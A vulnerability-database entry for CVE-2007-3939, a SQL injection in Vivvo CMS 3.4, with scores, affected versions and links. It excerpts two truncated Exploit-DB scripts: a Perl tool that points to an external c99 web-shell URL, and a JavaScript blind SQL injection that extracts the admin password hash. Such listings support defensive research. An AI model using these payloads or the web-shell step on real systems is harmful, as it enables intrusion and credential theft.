CVE-2007-3939
Published 2007-07-21
Priority P3 38, medium, 6.8 (CVSS 2.0)
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.07% (79.1th percentile)
SQL injection vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) CMS 3.4 and earlier allows remote attackers to execute arbitrary SQL commands via the category parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.40 | — |
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo CMS 3.4 - 'index.php' Blind SQL Injection
exploitdb·2007-07-18
---
Vivvo CMS
//'===============================================================================================
//'[Script Name: Vivvo CMS ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
No writeups or analysis indexed.
http://osvdb.org/39110
http://www.securityfocus.com/bid/24955
https://exchange.xforce.ibmcloud.com/vulnerabilities/35464
https://www.exploit-db.com/exploits/4192